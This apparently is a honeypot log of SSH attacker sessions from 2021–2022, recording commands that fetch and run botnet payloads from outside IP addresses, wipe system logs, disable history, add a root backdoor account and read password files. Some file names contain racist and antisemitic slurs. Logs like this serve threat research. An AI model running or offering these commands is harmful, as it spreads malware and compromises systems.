cd /tmp
rm -rf 351*
wget http://45.67.230.216/351.sh
curl -O http://45.67.230.216/351.sh
chmod 777 351.sh
./351.sh server
sh 351.sh server
Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server
cd /tmp
rm -rf 351*
wget http://45.67.230.216/351.sh
curl -O http://45.67.230.216/351.sh
chmod 777 351.sh
./351.sh server
sh 351.sh server
Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server
cd /tmp
rm -rf 351*
wget http://45.67.230.216/351.sh
curl -O http://45.67.230.216/351.sh
chmod 777 351.sh
./351.sh server
sh 351.sh server
Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server
cd /tmp
rm -rf 351*
wget http://45.67.230.216/351.sh
curl -O http://45.67.230.216/351.sh
chmod 777 351.sh
./351.sh server
sh 351.sh server
Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server
cd /tmp
rm -rf 351*
wget http://45.67.230.216/351.sh
curl -O http://45.67.230.216/351.sh
chmod 777 351.sh
./351.sh server
sh 351.sh server

From 34.107.101.194 23-Dec-2022 03:53:29 ssh2 root
Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server
cd /tmp
rm -rf 351*
wget http://45.67.230.216/351.sh
curl -O http://45.67.230.216/351.sh
chmod 777 351.sh
./351.sh server
sh 351.sh server

File: fakesshd-log-2021.txt


From 109.104.151.10 1-Jan-2021 15:10:58 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.130/setup.sh; curl -O http://109.104.151.130/setup.sh; chmod 777 setup.sh; sh setup.sh; tftp 109.104.151.130 -c get setup.sh; chmod 777 setup.sh; sh setup.sh; tftp -r setup2.sh -g 109.104.151.130; chmod 777 setup2.sh; sh setup2.sh; ftpget -v -u anonymous -p anonymous -P 21 109.104.151.130 setup1.sh setup1.sh; sh setup1.sh; rm -rf setup.sh setup.sh setup2.sh setup1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.130/setup.sh
curl -O http://109.104.151.130/setup.sh
chmod 777 setup.sh
sh setup.sh
tftp 109.104.151.130 -c get setup.sh
chmod 777 setup.sh
sh setup.sh
tftp -r setup2.sh -g 109.104.151.130
chmod 777 setup2.sh
sh setup2.sh
ftpget -v -u anonymous -p anonymous -P 21 109.104.151.130 setup1.sh setup1.sh
sh setup1.sh
rm -rf setup.sh setup.sh setup2.sh setup1.sh
rm -rf *

From 167.99.210.58 1-Jan-2021 15:51:41 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://63.250.56.87/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 63.250.56.87 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://63.250.56.87/Fourloko.sh
chmod 777 *
sh Fourloko.sh
tftp -g 63.250.56.87 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 185.117.119.235 2-Jan-2021 08:05:56 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.117.119.71/Optzl/7rtzl.x86_64; curl -O http://185.117.119.71/Optzl/7rtzl.x86_64; chmod +x 7rtzl.x86_64; ./7rtzl.x86_64 Exploit.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.117.119.71/Optzl/7rtzl.x86_64
curl -O http://185.117.119.71/Optzl/7rtzl.x86_64
chmod +x 7rtzl.x86_64
./7rtzl.x86_64 Exploit.x86

From 61.83.181.17 3-Jan-2021 04:27:23 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://209.141.41.96/x86_64; chmod 777 x86_64; ./x86_64
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://209.141.41.96/x86_64
chmod 777 x86_64
./x86_64

From 105.187.233.22 3-Jan-2021 04:57:16 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget https://cdn.discordapp.com/attachments/788792529372839956/790622745460998174/fatnigger.x86; chmod 777 *; ./fatnigger.x86 root
cd /tmp cd /var/run cd /mnt cd /root cd /
wget https://cdn.discordapp.com/attachments/788792529372839956/790622745460998174/fatnigger.x86
chmod 777 *
./fatnigger.x86 root

From 178.62.106.247 3-Jan-2021 09:21:46 ssh2 root
Exec uname -s -v -n -r -m
uname -s -v -n -r -m
Exec uname -s -v -n -r -m
uname -s -v -n -r -m
Exec uname -s -v -n -r -m
uname -s -v -n -r -m
Exec uname -s -v -n -r -m
uname -s -v -n -r -m

From 178.62.106.247 3-Jan-2021 09:30:27 ssh2 root
Exec uname -s -v -n -r -m
uname -s -v -n -r -m
Exec uname -s -v -n -r -m
uname -s -v -n -r -m
Exec uname -s -v -n -r -m
uname -s -v -n -r -m

From 178.62.106.247 3-Jan-2021 09:30:47 ssh2 root
Exec uname -s -v -n -r -m
uname -s -v -n -r -m
Exec uname -s -v -n -r -m
uname -s -v -n -r -m

From 121.140.205.129 3-Jan-2021 19:03:47 ssh2 root
Exec (uname -smr || /bin/uname -smr || /usr/bin/uname -smr)
(uname -smr || /bin/uname -smr || /usr/bin/uname -smr)
Exec ping 8.8.8.8
ping 8.8.8.8

From 51.178.215.251 4-Jan-2021 10:58:56 ssh2 root
Exec wget http://51.178.215.251/we.sh; curl -O http://51.178.215.251/we.sh; chmod 777 we.sh; sh we.sh
wget http://51.178.215.251/we.sh
curl -O http://51.178.215.251/we.sh
chmod 777 we.sh
sh we.sh

From 51.89.107.21 5-Jan-2021 14:28:49 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://130.185.78.144/GhOul.sh; chmod 777 GhOul.sh; sh GhOul.sh; tftp 130.185.78.144 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 130.185.78.144; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 130.185.78.144 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://130.185.78.144/GhOul.sh
chmod 777 GhOul.sh
sh GhOul.sh
tftp 130.185.78.144 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 130.185.78.144
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 130.185.78.144 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 165.227.133.3 6-Jan-2021 17:37:44 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.14.224.103/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 45.14.224.103 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.14.224.103; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.14.224.103/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 45.14.224.103 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 45.14.224.103
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 51.178.218.150 7-Jan-2021 01:19:46 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.178.218.149/x-8.6-.GHOUL; chmod +x x-8.6-.GHOUL; ./x-8.6-.GHOUL; rm -rf x-8.6-.GHOUL cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.178.218.149/x-3.2-.GHOUL; chmod +x x-3.2-.GHOUL; ./x-3.2-.GHOUL; rm -rf x-3.2-.GHOUL
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.178.218.149/x-8.6-.GHOUL
chmod +x x-8.6-.GHOUL
./x-8.6-.GHOUL
rm -rf x-8.6-.GHOUL cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.178.218.149/x-3.2-.GHOUL
chmod +x x-3.2-.GHOUL
./x-3.2-.GHOUL
rm -rf x-3.2-.GHOUL

From 193.239.147.226 7-Jan-2021 11:05:44 ssh2 root
Exec cat /etc/issue ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.x86 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.x86 ; chmod 777 downloadthesebinsyoudirtyslut.x86 ; ./downloadthesebinsyoudirtyslut.x86 OPENSSH-2.0 x86 ; wget 193.239.147.226/nigga ; curl -O 193.239.147.226/ ; chmod 777 nigga ; ./nigga OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.mips ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.mips ; chmod 777 downloadthesebinsyoudirtyslut.mips ; ./downloadthesebinsyoudirtyslut.mips otherbinexecxdlmfao ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm ; chmod 777 downloadthesebinsyoudirtyslut.arm ; ./downloadthesebinsyoudirtyslut.arm OPENSSH-2.0 IoT ; wget 193.239.147.226/niggadownloadthesebinsyoudirtyslut.arm5 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm5 ; chmod 777 downloadthesebinsyoudirtyslut.arm5 ; ./downloadthesebinsyoudirtyslut.arm5 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm6 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm6 ; chmod 777 downloadthesebinsyoudirtyslut.arm6 ; ./downloadthesebinsyoudirtyslut.arm6 OPENSSH-2.0 IoT ; wget 193.239.147.226/niggadownloadthesebinsyoudirtyslut.arm7 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm7 ; chmod 777 downloadthesebinsyoudirtyslut.arm7 ; ./downloadthesebinsyoudirtyslut.arm7 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.ppc ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.ppc ; chmod 777 downloadthesebinsyoudirtyslut.ppc ; ./downloadthesebinsyoudirtyslut.ppc OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.sh4 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.sh4 ; chmod 777 downloadthesebinsyoudirtyslut.sh4 ; ./downloadthesebinsyoudirtyslut.sh4 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.m68k ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.m68k ; chmod 777 downloadthesebinsyoudirtyslut.m68k ; ./downloadthesebinsyoudirtyslut.m68k OPENSSH-2.0 IoT ; rm -rf nigga* ; r9gj 193.239.147.226/bot.pl ; perl bot.pl ; curl -O 193.239.147.226/bot.pl ; perl bot.pl ; rm -rf bot* ; rm -rf bot* ; history -c
cat /etc/issue
wget 193.239.147.226/downloadthesebinsyoudirtyslut.x86
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.x86
chmod 777 downloadthesebinsyoudirtyslut.x86
./downloadthesebinsyoudirtyslut.x86 OPENSSH-2.0 x86
wget 193.239.147.226/nigga
curl -O 193.239.147.226/
chmod 777 nigga
./nigga OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.mips
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.mips
chmod 777 downloadthesebinsyoudirtyslut.mips
./downloadthesebinsyoudirtyslut.mips otherbinexecxdlmfao
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm
chmod 777 downloadthesebinsyoudirtyslut.arm
./downloadthesebinsyoudirtyslut.arm OPENSSH-2.0 IoT
wget 193.239.147.226/niggadownloadthesebinsyoudirtyslut.arm5
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm5
chmod 777 downloadthesebinsyoudirtyslut.arm5
./downloadthesebinsyoudirtyslut.arm5 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm6
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm6
chmod 777 downloadthesebinsyoudirtyslut.arm6
./downloadthesebinsyoudirtyslut.arm6 OPENSSH-2.0 IoT
wget 193.239.147.226/niggadownloadthesebinsyoudirtyslut.arm7
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm7
chmod 777 downloadthesebinsyoudirtyslut.arm7
./downloadthesebinsyoudirtyslut.arm7 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.ppc
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.ppc
chmod 777 downloadthesebinsyoudirtyslut.ppc
./downloadthesebinsyoudirtyslut.ppc OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.sh4
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.sh4
chmod 777 downloadthesebinsyoudirtyslut.sh4
./downloadthesebinsyoudirtyslut.sh4 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.m68k
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.m68k
chmod 777 downloadthesebinsyoudirtyslut.m68k
./downloadthesebinsyoudirtyslut.m68k OPENSSH-2.0 IoT
rm -rf nigga*
r9gj 193.239.147.226/bot.pl
perl bot.pl
curl -O 193.239.147.226/bot.pl
perl bot.pl
rm -rf bot*
rm -rf bot*
history -c

From 146.255.75.178 7-Jan-2021 15:49:57 ssh2 root
w
ps x
ls cpu
lscpu

From 146.255.75.178 7-Jan-2021 15:50:44 ssh2 root
ls
cd /home
ls
ls -a
cd .ssh
ls
ls -a
cd .ssh
ls
cd
cd
cd ..
ls
ls -a
cd /etc
ls
cat Mail
ls
clear
ls
exit

From 146.255.75.178 8-Jan-2021 01:14:16 ssh2 root
w
lscpu
w
cat /etc/issue
uname -a
ls
cd /home
ls
cd /etc
ls
ls -a
ls
cd
ls
mkdirr .ssh

From 121.4.66.32 8-Jan-2021 08:40:07 ssh2 root
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime

From 37.46.150.206 8-Jan-2021 14:24:22 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.211/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 185.10.68.211 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.10.68.211/Fourloko.sh
chmod 777 *
sh Fourloko.sh
tftp -g 185.10.68.211 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 193.239.147.226 9-Jan-2021 03:30:12 ssh2 root
Exec cat /etc/issue ; wget 193.239.147.226/fbot.x86 ; curl -O 193.239.147.226/fbot.x86 ; chmod 777 fbot.x86 ; ./fbot.x86 OPENSSH-2.0 x86 ; wget 193.239.147.226/niggafbot.x86_64 ; curl -O 193.239.147.226/fbot.x86_64 ; chmod 777 niggafbot.x86_64 ; ./niggafbot.x86_64 OPENSSH-2.0 IoT ; wget 193.239.147.226/fbot.mips ; curl -O 193.239.147.226/fbot.mips ; chmod 777 fbot.mips ; ./fbot.mips otherbinexecxdlmfao ; wget 193.239.147.226/fbot.arm4 ; curl -O 193.239.147.226/fbot.arm4 ; chmod 777 fbot.arm4 ; ./fbot.arm4 OPENSSH-2.0 IoT ; wget 193.239.147.226/niggafbot.arm5 ; curl -O 193.239.147.226/fbot.arm5 ; chmod 777 fbot.arm5 ; ./fbot.arm5 OPENSSH-2.0 IoT ; wget 193.239.147.226/fbot.arm6 ; curl -O 193.239.147.226/fbot.arm6 ; chmod 777 fbot.arm6 ; ./fbot.arm6 OPENSSH-2.0 IoT ; wget 193.239.147.226/niggafbot.arm7 ; curl -O 193.239.147.226/fbot.arm7 ; chmod 777 fbot.arm7 ; ./fbot.arm7 OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; rm -rf nigga* ; r9gj 193.239.147.226/bot.pl ; perl bot.pl ; curl -O 193.239.147.226/bot.pl ; perl bot.pl ; rm -rf bot* ; rm -rf bot* ; history -c
cat /etc/issue
wget 193.239.147.226/fbot.x86
curl -O 193.239.147.226/fbot.x86
chmod 777 fbot.x86
./fbot.x86 OPENSSH-2.0 x86
wget 193.239.147.226/niggafbot.x86_64
curl -O 193.239.147.226/fbot.x86_64
chmod 777 niggafbot.x86_64
./niggafbot.x86_64 OPENSSH-2.0 IoT
wget 193.239.147.226/fbot.mips
curl -O 193.239.147.226/fbot.mips
chmod 777 fbot.mips
./fbot.mips otherbinexecxdlmfao
wget 193.239.147.226/fbot.arm4
curl -O 193.239.147.226/fbot.arm4
chmod 777 fbot.arm4
./fbot.arm4 OPENSSH-2.0 IoT
wget 193.239.147.226/niggafbot.arm5
curl -O 193.239.147.226/fbot.arm5
chmod 777 fbot.arm5
./fbot.arm5 OPENSSH-2.0 IoT
wget 193.239.147.226/fbot.arm6
curl -O 193.239.147.226/fbot.arm6
chmod 777 fbot.arm6
./fbot.arm6 OPENSSH-2.0 IoT
wget 193.239.147.226/niggafbot.arm7
curl -O 193.239.147.226/fbot.arm7
chmod 777 fbot.arm7
./fbot.arm7 OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
rm -rf nigga*
r9gj 193.239.147.226/bot.pl
perl bot.pl
curl -O 193.239.147.226/bot.pl
perl bot.pl
rm -rf bot*
rm -rf bot*
history -c

From 109.104.151.10 9-Jan-2021 04:14:57 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.117.119.71/0x83911d24Fx.sh; curl -O http://185.117.119.71/0x83911d24Fx.sh; chmod 777 0x83911d24Fx.sh; sh 0x83911d24Fx.sh; tftp 185.117.119.71 -c get 0xt984767.sh; chmod 777 0xft6426467.sh; sh 0xft6426467.sh; tftp -r 0xtf2984767.sh -g 185.117.119.71; chmod 777 0xtf2984767.sh; sh 0xtf2984767.sh; ftpget -v -u anonymous -p anonymous -P 21 185.117.119.71 0xft6426467.sh 0xft6426467.sh; sh 0xft6426467.sh; rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.117.119.71/0x83911d24Fx.sh
curl -O http://185.117.119.71/0x83911d24Fx.sh
chmod 777 0x83911d24Fx.sh
sh 0x83911d24Fx.sh
tftp 185.117.119.71 -c get 0xt984767.sh
chmod 777 0xft6426467.sh
sh 0xft6426467.sh
tftp -r 0xtf2984767.sh -g 185.117.119.71
chmod 777 0xtf2984767.sh
sh 0xtf2984767.sh
ftpget -v -u anonymous -p anonymous -P 21 185.117.119.71 0xft6426467.sh 0xft6426467.sh
sh 0xft6426467.sh
rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh
rm -rf *

From 194.62.6.190 9-Jan-2021 20:23:18 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.33.22/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 209.141.33.22 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.33.22/Fourloko.sh
chmod 777 *
sh Fourloko.sh
tftp -g 209.141.33.22 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 146.255.75.178 9-Jan-2021 23:36:39 ssh2 root
w
cd /home
ls
lscpu
cd /tmp
ls
exit

From 146.255.75.178 10-Jan-2021 02:51:32 ssh2 root
w
nproc
lscpu
cd /home
ls
ls -a
ps x
cd /tmp
ls
cd /home
ls
cat mail
jebem ti mater kurac mi popusi poizdrav
exit

From 34.86.59.252 11-Jan-2021 03:39:43 ssh2 root
Exec cat /etc/issue ; wget 119.147.213.57/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 119.147.213.57/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl
cat /etc/issue
wget 119.147.213.57/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 119.147.213.57/bot.pl
perl bot.pl
history -c
rm -rf bot.pl

From 188.166.63.236 11-Jan-2021 17:33:47 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.123.209.58/random.sh; curl -O http://208.123.209.58/random.sh; chmod 777 random.sh; sh random.sh; tftp 208.123.209.58 -c get random3.sh; chmod 777 random3.sh; sh random3.sh; tftp -r random2.sh -g 208.123.209.58; chmod 777 random2.sh; sh random2.sh; ftpget -v -u anonymous -p anonymous -P 21 208.123.209.58 random1.sh random1.sh; sh random1.sh; rm -rf random.sh random3.sh random2.sh random1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://208.123.209.58/random.sh
curl -O http://208.123.209.58/random.sh
chmod 777 random.sh
sh random.sh
tftp 208.123.209.58 -c get random3.sh
chmod 777 random3.sh
sh random3.sh
tftp -r random2.sh -g 208.123.209.58
chmod 777 random2.sh
sh random2.sh
ftpget -v -u anonymous -p anonymous -P 21 208.123.209.58 random1.sh random1.sh
sh random1.sh
rm -rf random.sh random3.sh random2.sh random1.sh
rm -rf *

From 195.22.153.177 11-Jan-2021 17:44:14 ssh2 root
Exec nc 1 1; cat /etc/issue
nc 1 1
cat /etc/issue

From 86.120.179.168 11-Jan-2021 17:49:31 ssh2 root
unset
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
export
w
nproc
unset
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
export
ifconfig
cat /etc/passwd
cat /etc/passwd
cd /dev/
ls a
cd shm
ls -a
uname -a
cat /etc/issue
perl

From 86.120.179.168 11-Jan-2021 17:50:57 ssh2 root
yum
apt-get
apt-get intall perl
ps -x

From 86.120.179.168 11-Jan-2021 17:55:29 ssh2 root
w
ps -x
reboot
restart
kill -9 17509
kill -9 17341
ps -x
exit

From 142.93.60.98 12-Jan-2021 04:28:09 ssh2 root
Exec /ip cloud print
/ip cloud print
Exec nproc;uname -a
nproc
uname -a

From 167.99.217.163 12-Jan-2021 12:06:28 ssh2 root
Exec cd /tmp/; wget http://5.253.84.120/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh; rm -rf *; history -c;

cd /tmp/
wget http://5.253.84.120/bins.sh
chmod 777 bins.sh
sh bins.sh
rm -rf bins.sh
rm -rf *
history -c

From 92.234.53.29 12-Jan-2021 13:43:39 ssh2 root
w
unam e-a
uname -a
/usr/sbin/useradd -o -u 0 admin
adduser admin
cat /etc/shadow
w
uname -a
wget denis.do.am/ah.txt
curl -O denis.do.am/ah.txt
lynx
wget
cat /etc/issue
cat /etc/hosts
uname -a

From 37.46.150.195 12-Jan-2021 20:55:49 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.46.150.225/tekiero.sh; chmod 777 tekiero.sh; sh tekiero.sh; sh /tekiero.sh; bash tekiero.sh; bash /tekiero.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.46.150.225/tekiero.sh
chmod 777 tekiero.sh
sh tekiero.sh
sh /tekiero.sh
bash tekiero.sh
bash /tekiero.sh
rm -rf *

From 134.122.15.247 12-Jan-2021 23:46:47 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.46.150.225/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 37.46.150.225 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 37.46.150.225; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.46.150.225/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 37.46.150.225 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 37.46.150.225
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 104.248.27.245 13-Jan-2021 11:15:19 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.14.224.103/Beastmode.sh; curl -O http://45.14.224.103/Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp 45.14.224.103 -c get Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp -r Beastmode2.sh -g 45.14.224.103; chmod 777 Beastmode2.sh; sh Beastmode2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.14.224.103 Beastmode1.sh Beastmode1.sh; sh Beastmode1.sh; rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.14.224.103/Beastmode.sh
curl -O http://45.14.224.103/Beastmode.sh
chmod 777 Beastmode.sh
sh Beastmode.sh
tftp 45.14.224.103 -c get Beastmode.sh
chmod 777 Beastmode.sh
sh Beastmode.sh
tftp -r Beastmode2.sh -g 45.14.224.103
chmod 777 Beastmode2.sh
sh Beastmode2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.14.224.103 Beastmode1.sh Beastmode1.sh
sh Beastmode1.sh
rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh
rm -rf *

From 35.202.216.172 13-Jan-2021 11:30:47 ssh2 root
Exec uname -a;cat /etc/issue
uname -a
cat /etc/issue

From 37.46.150.206 13-Jan-2021 17:05:47 ssh2 root
Exec hostname -a
hostname -a

From 188.24.3.159 16-Jan-2021 02:16:02 ssh2 root
unset HISTFILE HISTSAVE HISTLOG SCREEN
w
unset HISTFILE HISTSAVE HISTOG SCREEN
w
ls -al
cat .bash_history
wget
cat /etc/issue
cd .ssh
ls -al
exit

From 193.239.147.226 16-Jan-2021 04:35:37 ssh2 root
Exec cat /etc/issue ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.x86 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.x86 ; chmod 777 downloadthesebinsyoudirtyslut.x86 ; ./downloadthesebinsyoudirtyslut.x86 OPENSSH-2.0 x86 ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777 nigga ; ./ OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.mips ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.mips ; chmod 777 downloadthesebinsyoudirtyslut.mips ; ./downloadthesebinsyoudirtyslut.mips otherbinexecxdlmfao ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm4 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm4 ; chmod 777 downloadthesebinsyoudirtyslut.arm4 ; ./downloadthesebinsyoudirtyslut.arm4 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm5 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm5 ; chmod 777 downloadthesebinsyoudirtyslut.arm5 ; ./downloadthesebinsyoudirtyslut.arm5 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm6 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm6 ; chmod 777 downloadthesebinsyoudirtyslut.arm6 ; ./downloadthesebinsyoudirtyslut.arm6 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm7 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm7 ; chmod 777 downloadthesebinsyoudirtyslut.arm7 ; ./downloadthesebinsyoudirtyslut.arm7 